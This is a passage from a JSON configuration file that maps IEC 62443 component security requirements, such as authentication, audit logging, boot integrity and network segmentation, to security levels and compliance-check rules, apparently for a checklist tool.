interfaces","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"88763e20-7878-4525-81d8-c4d09b867042","ComparisonType":"==","Value":true}},"NeedsReview":true}},{"ID":"d47f441d-e3bf-461d-b724-47a90c19bc89","Name":"CR-1-2 Software process and device identification and authentication","Description":"","subReqTypeIDs":["3480145a-7767-48e8-a55c-09514771d17f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3480145a-7767-48e8-a55c-09514771d17f","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"83a019dd-d28b-4f3d-bf48-e254d2031445","Name":"CR-1-3 Account management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"b7bcf087-c925-4eec-9a11-e042250afbf1","Name":"CR-1-4 Identifier management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"f28381c7-5c24-4fd3-b75e-03fbebe03857","Name":"CR-1-5 Authenticator management","Description":"","subReqTypeIDs":["afa6717a-657d-462f-be28-04fe00231224"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"afa6717a-657d-462f-be28-04fe00231224","Name":"RE-1 Hardware security for authenticators","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"bd31bc1e-43ed-48f2-80ae-885680bcd378","Name":"CR-1-6 Wireless access management","Description":"","subReqTypeIDs":["cb2f2e32-bd57-4fed-8c04-9efd325ecc08"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"cb2f2e32-bd57-4fed-8c04-9efd325ecc08","Name":"RE-1 Unique identification and authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"40670f38-5fd9-47a3-994b-41a271a71694","Name":"CR-1-7 Strength of password-based authentication","Description":"","subReqTypeIDs":["41bd377e-a304-44ae-aabc-807d51f3772d","9b275641-37b2-4da1-a70a-1cc365085a99"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"540e39da-3227-4e6c-86ea-32a017318511","ComparisonType":"==","Value":true}}}},{"ID":"41bd377e-a304-44ae-aabc-807d51f3772d","Name":"RE-1 Password generation and lifetime restrictions for human users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"","ComparisonType":"==","Value":true}}}},{"ID":"9b275641-37b2-4da1-a70a-1cc365085a99","Name":"RE-2 Password lifetime restrictions for all users (human, software, process or device)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"72982bda-38dc-4904-8080-4e7a37df743d","Name":"CR-1-8 Public key infrastructure certificates","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"ccb81ee9-073d-4deb-aed5-7972b2d212a3","Name":"CR-1-9 Strength of public key-based authentication","Description":"","subReqTypeIDs":["cfd6bbed-bff7-44e9-866a-ea3a217cb32c"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"cfd6bbed-bff7-44e9-866a-ea3a217cb32c","Name":"RE-1 Hardware security for public key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","Name":"CR-1-10 Authenticator feedback","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"370cc79b-a473-4247-b171-4ad0233a0a34","Name":"CR-1-11 Unsuccessful login attempts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"f049724d-ed42-4c16-af4e-9bcacffc7f0b","PropertyRest":{"ID":"aa74f499-b995-4f5e-8d92-91f3ca172743","ComparisonType":"==","Value":true}}}},{"ID":"a8e6d55e-3440-46b1-8624-bcb1bd8364cc","Name":"CR-1-12 System use notifications","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c5230fd4-d5f9-4229-8f71-170617397b3a","Name":"NDR-1-13 Access via untrusted networks","Description":"","subReqTypeIDs":["3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3a1fcb32-f7d2-4aee-bc69-d7d2fad4a1b2","Name":"RE-1 Explicit access request approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"65a904e7-9c92-4932-946e-042b19d5c7c9","Name":"NDR-1-14 Strength of symmetric key-based authentication","Description":"","subReqTypeIDs":["1177ff8e-e4b0-49cf-b59f-f01ed37401e6"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1177ff8e-e4b0-49cf-b59f-f01ed37401e6","Name":"RE-1 Hardware security for symmetric key-based authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"dda8e95b-17ba-465f-a789-430d5a378ee1","Name":"CR-2-1 Authorization enforcement","Description":"","subReqTypeIDs":["8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","2872406c-cd16-433f-af5d-23401f08c6eb","39f2063b-c426-4504-a00e-4d77a69aba7e","646f8c75-c631-4b2e-af11-4d069816cefe"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a9f3fdc-4b47-45d8-97d0-29baf9b5aee5","Name":"RE-1 Authorization enforcement for all users (human, software, processes, devices)","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2872406c-cd16-433f-af5d-23401f08c6eb","Name":"RE-2 Permission mapping of roles","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"39f2063b-c426-4504-a00e-4d77a69aba7e","Name":"RE-3 Supervisor override","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"646f8c75-c631-4b2e-af11-4d069816cefe","Name":"RE-4 Dual approval","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"ff84fa60-5084-438a-9536-7f2fb011c9b3","Name":"CR-2-2 Wireless use control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8cfe7593-93b6-4b0c-a715-caddbc7d18cb","Name":"CR-2-3 Use control for portable and mobile devices","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"532c1932-789e-4fbb-8167-6d63eb789c92","Name":"SAR-2-4 Mobile code","Description":"","subReqTypeIDs":["eb2fbe1f-2d10-40cf-ba68-c72e03b3154b"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"eb2fbe1f-2d10-40cf-ba68-c72e03b3154b","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"401ef547-ea2c-4398-8015-66490cb02976","Name":"EDR-2-4 Mobile code ","Description":"","subReqTypeIDs":["b8252e5d-de07-4b58-bab7-0869f9bed5a2"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b8252e5d-de07-4b58-bab7-0869f9bed5a2","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"37d9f118-5bb7-4691-976b-2c949172dce3","Name":"HDR-2-4 Mobile code","Description":"","subReqTypeIDs":["6bafc0b1-efbf-4eb9-a83d-c4e8714420bc"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6bafc0b1-efbf-4eb9-a83d-c4e8714420bc","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"5740c4a1-403c-482a-a235-fff4444fb92e","Name":"NDR-2-4 Mobile code","Description":"","subReqTypeIDs":["8db6ce88-f19f-4f3d-8d8e-6dfefff6123c"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8db6ce88-f19f-4f3d-8d8e-6dfefff6123c","Name":"RE-1 Mobile code integrity check","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","Name":"CR-2-5 Session lock","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"3e691ca4-eb77-4be1-902e-04c75aefcd00","Name":"CR-2-6 Remote session termination","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"3af81552-bb3f-4125-99d2-6127fa74c428","Name":"CR-2-7 Concurrent session control","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"779d3751-b9bd-4e97-80db-70a0631181ad","Name":"CR-2-8 Auditable events","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"IsActive","ComparisonType":"==","Value":true}}}},{"ID":"ed08bb4b-7e98-47b1-bf97-cbce20a304cd","Name":"CR-2-9 Audit storage capacity","Description":"","subReqTypeIDs":["c504eafc-876f-47a4-8a60-cb0f7816747e"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"c504eafc-876f-47a4-8a60-cb0f7816747e","Name":"RE-1 Warn when audit record storage capacity threshold reached","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{"RuleType":1,"SWRule":{"ComponentTypeID":"02b94aae-efea-451e-a017-81be68db03d7","PropertyRest":{"ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","ComparisonType":"==","Value":true}}}},{"ID":"5c662093-fd9f-4861-ae05-41f91e6a3514","Name":"CR-2-10 Response to audit processing failures","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0317d147-90d9-4879-bf07-6e167c0dc533","Name":"CR-2-11 Timestamps","Description":"","subReqTypeIDs":["9c3f74c1-f63b-4b83-843d-c67a63c634a5","6137a0c0-5939-4857-a44c-c117a3d99531"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c3f74c1-f63b-4b83-843d-c67a63c634a5","Name":"RE-1 Time synchronization","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"6137a0c0-5939-4857-a44c-c117a3d99531","Name":"RE-2 Protection of time source integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,false,true],"ReqFulfillRule":{}},{"ID":"3d164cce-adde-41cd-9470-c0e60ff22559","Name":"CR-2-12 Non-repudiation","Description":"","subReqTypeIDs":["5fea8725-6bae-4cf8-9a3a-ec4669bec7a1"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"5fea8725-6bae-4cf8-9a3a-ec4669bec7a1","Name":"RE-1 Non-repudiation for all users","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"77a29d2d-372e-4c12-b538-81f95afd6e0b","Name":"EDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1243b38d-ea80-424c-946c-c8f9aef190fd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1243b38d-ea80-424c-946c-c8f9aef190fd","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"956c289a-0cd4-4e8c-831a-b327c8dbbde5","Name":"HDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["735882c4-439f-4cca-a97f-0e535519fe2f"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"735882c4-439f-4cca-a97f-0e535519fe2f","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","Name":"NDR-2-13 Use of physical diagnostic and test interfaces","Description":"","subReqTypeIDs":["1a69695b-d04e-409d-9256-4be696ea78df"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1a69695b-d04e-409d-9256-4be696ea78df","Name":"RE-1 Active monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"79bd4891-d677-4c06-91d6-3bc414e59193","Name":"CR-3-1 Communication integrity","Description":"","subReqTypeIDs":["79b5872c-1d0e-498f-8fe7-c97f1163a4b3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"79b5872c-1d0e-498f-8fe7-c97f1163a4b3","Name":"RE-1 Communication authentication","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"c5b4aa95-a00a-42b3-96ca-31d98557a19c","Name":"SAR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b26d4748-2b7c-4821-b11a-f51fd7e85307","Name":"EDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8a51e9e7-b87f-4d62-85df-288320d456f1","Name":"HDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":["888d4fc0-a127-4890-9de2-46a3235ff069"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"888d4fc0-a127-4890-9de2-46a3235ff069","Name":"RE-1 Report version of code protection","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"13a182cc-6caa-4193-8fd2-4b497e0a16ed","Name":"NDR-3-2 Protection from malicious code","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"9c8a4b08-ce26-467d-8d7d-bf9db81f8944","Name":"CR-3-3 Security functionality verification","Description":"","subReqTypeIDs":["a6729f24-7a95-432b-a61c-98c2621246e0"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"a6729f24-7a95-432b-a61c-98c2621246e0","Name":"RE-1 Security functionality verification during normal operation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"63a333db-4074-4ebc-9fa5-63a248e9e3e1","Name":"CR-3-4 Software and information integrity","Description":"","subReqTypeIDs":["73159393-9139-4f82-9980-a28e2285c936","d62835c2-73c9-4fdd-a01c-a92a613ba773"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"73159393-9139-4f82-9980-a28e2285c936","Name":"RE-1 Authenticity of software and information","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d62835c2-73c9-4fdd-a01c-a92a613ba773","Name":"RE-2 Automated notification of integrity violations","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"b6dcb790-3ce2-4635-839e-3b2032499ffa","Name":"CR-3-5 Input validation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0d163821-ac6f-4969-81d6-821afc8f181e","Name":"CR-3-6 Deterministic output","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","Name":"CR-3-7 Error handling","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","Name":"CR-3-8 Session integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f74ea015-618a-4553-86b8-c2917ff637ae","Name":"CR-3-9 Protection of audit information","Description":"","subReqTypeIDs":["df820586-0d90-4d3a-848b-31695c26f589"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"df820586-0d90-4d3a-848b-31695c26f589","Name":"RE-1 Audit records on write-once media","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,null,true],"ReqFulfillRule":{}},{"ID":"41defa29-c849-4680-847b-9f40fabc7286","Name":"EDR-3-10 Support for updates","Description":"","subReqTypeIDs":["f38c5728-f34c-412e-92da-323f7b4e9a81"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ac95cfac-e4b9-4639-a066-3bf7df6c7c73","Name":"HDR-3-10 Support for updates","Description":"","subReqTypeIDs":["16784a5f-9b1c-49b8-aafb-38efb2d353d3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1a731a13-8b40-4b33-aa7f-286a3bc2882a","Name":"NDR-3-10 Support for updates","Description":"","subReqTypeIDs":["4e1187a2-cc24-44be-9224-f623a08d9c4d"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f38c5728-f34c-412e-92da-323f7b4e9a81","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"16784a5f-9b1c-49b8-aafb-38efb2d353d3","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"4e1187a2-cc24-44be-9224-f623a08d9c4d","Name":"RE-1 Update authenticity and integrity","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e62acf0c-4013-468c-9bb7-7940d0270e69","Name":"EDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["af74cb52-979d-4d87-8f90-c5e7bd89bd24"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"af74cb52-979d-4d87-8f90-c5e7bd89bd24","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"57d7ca9b-b06e-4273-800f-8caa19dfb1e7","Name":"HDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["715c78fa-1a00-48be-8041-00d51fbaaea3"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"715c78fa-1a00-48be-8041-00d51fbaaea3","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","Name":"NDR-3-11 Physical tamper resistance and detection","Description":"","subReqTypeIDs":["db0f3812-37c4-4a42-994d-eed41733aecd"],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db0f3812-37c4-4a42-994d-eed41733aecd","Name":"RE-1 Notification of a tampering attempt","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","Name":"EDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d6b5b544-3184-43ba-bc05-ae90bf503067","Name":"HDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"15b54837-a7f6-4e95-8773-9b999abfa998","Name":"NDR-3-12 Provisioning product supplier root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2e279fd1-f688-4c9a-aee2-abff49d6b1ab","Name":"EDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"db2383ba-3aba-408b-8317-6c10af37d1ea","Name":"HDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d30db9ad-4a71-4e14-bc8f-718834d56e03","Name":"NDR-3-13 Provisioning of asset owner root of trusts","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"d8332abf-0ac2-4096-bde8-02f5716ba15e","Name":"EDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["ea71647c-8da7-47d1-afbb-74c1f2a650c3"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"b4c58d1f-016b-4244-baf3-e2ee57eff599","Name":"HDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["05e9457f-fbee-4d97-9544-602355a9cfcf"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","Name":"NDR-3-14 Integrity of the boot process","Description":"","subReqTypeIDs":["f5f5cd83-4363-4d82-bae8-1d544d819817"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"ea71647c-8da7-47d1-afbb-74c1f2a650c3","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"05e9457f-fbee-4d97-9544-602355a9cfcf","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"f5f5cd83-4363-4d82-bae8-1d544d819817","Name":"RE-1 Authenticity of the boot process","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"926c6b5b-0a1f-4833-a612-97691a10d83f","Name":"CR-4-1 Information confidentiality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"6cefc8a9-b69b-4197-961c-dbbc27cbd23b","Name":"CR-4-2 Information persistence","Description":"","subReqTypeIDs":["f7aecf4a-2116-4ae0-91b1-3662d934c780","a89a4958-6563-4000-94c0-89c8f6e8957c"],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"4854fee5-99e3-4c4b-8b53-4c37629005d0","Name":"CR-4-3 Use of cryptography","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"f7aecf4a-2116-4ae0-91b1-3662d934c780","Name":"RE-1 Erase of shared memory resources","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"a89a4958-6563-4000-94c0-89c8f6e8957c","Name":"RE-2 Erase verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"8ed9c57b-fbe4-435a-8036-501cf5a95f3e","Name":"CR-5-1 Network segmentation","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"98d81760-6978-4372-809a-8303352c53b7","Name":"NDR-5-2 Zone boundary protection","Description":"","subReqTypeIDs":["1baf9958-8f82-471a-878f-b1fffa8635d5","e63f8128-7889-4913-8e11-9d47ec988ddf","77ae236f-11a6-4736-bb48-57c54ab5db07"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1baf9958-8f82-471a-878f-b1fffa8635d5","Name":"RE-1 Deny all, permit by exeption","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"e63f8128-7889-4913-8e11-9d47ec988ddf","Name":"RE-2 Island mode","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"77ae236f-11a6-4736-bb48-57c54ab5db07","Name":"RE-3 Fail close","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,false,true,true],"ReqFulfillRule":{}},{"ID":"b06635ce-dc29-44de-a719-81829a3962de","Name":"NDR-5-3 General purpose, person-to-person communication restrictions","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"72adfa45-cc4e-4539-ad87-99d1f46f4eab","Name":"CR-6-1 Audit log accessibility","Description":"","subReqTypeIDs":["1b81685b-6009-4433-b015-8a27125c2d21"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1b81685b-6009-4433-b015-8a27125c2d21","Name":"RE-1 Programmatic access to audit logs","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}},{"ID":"798e83ee-b5ad-46c2-8bd5-58c968e8390a","Name":"CR-6-2 Continuous monitoring","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"64064d6d-e701-4ebf-ab84-3f702b32b8ff","Name":"CR-7-1 Denial of service protection","Description":"","subReqTypeIDs":["1c033715-b1c1-45f1-a39d-0aeda88a1682"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"d07a5fcc-e3fa-4525-8253-e5463c56a905","Name":"CR-7-2 Resource management","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1c033715-b1c1-45f1-a39d-0aeda88a1682","Name":"RE-1 Manage communication load from component","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"1936692f-af1c-4335-b9c4-60ff1da57ae1","Name":"CR-7-3 Control system backup","Description":"","subReqTypeIDs":["1e5aec13-f2b6-4039-9f67-fa343e2c8098"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"0c455f28-1b52-4d02-b358-fc13ae9c2e85","Name":"CR-7-4 Control system recovery and reconstruction","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"1e5aec13-f2b6-4039-9f67-fa343e2c8098","Name":"RE-1 Backup integrity verification","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,true,true,true],"ReqFulfillRule":{}},{"ID":"2b6d967f-e572-4e6a-a5dd-11cdce427df4","Name":"CR-7-5 Emergency-power supply","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,false,false,false],"ReqFulfillRule":{}},{"ID":"1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","Name":"CR-7-6 Network and security configuration settings","Description":"","subReqTypeIDs":["ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f"],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"08cf1ab2-c34b-473e-a332-4e99c616db7d","Name":"CR-7-7 Least functionality","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[true,true,true,true],"ReqFulfillRule":{}},{"ID":"8d84eb63-48d8-41e8-aeb1-ef767a5fb572","Name":"CR-7-8 Control system component inventory","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[false,true,true,true],"ReqFulfillRule":{}},{"ID":"ffc7b8ca-e43d-4190-8f15-2ae2f3e8998f","Name":"RE-1 Machine-readable reporting of current security settings","Description":"","subReqTypeIDs":[],"RequiredPerLevel":[null,null,true,true],"ReqFulfillRule":{}}],"checklistTypes":[{"ID":"afc63fe6-27cc-4ab5-b44e-adcb29ecab49","Name":"IEC-62443","Description":"CR: Component requirement, SAR: Software application requirement, EDR: Embedded device requirement, HDR: Host device requirement, NDR: Network device 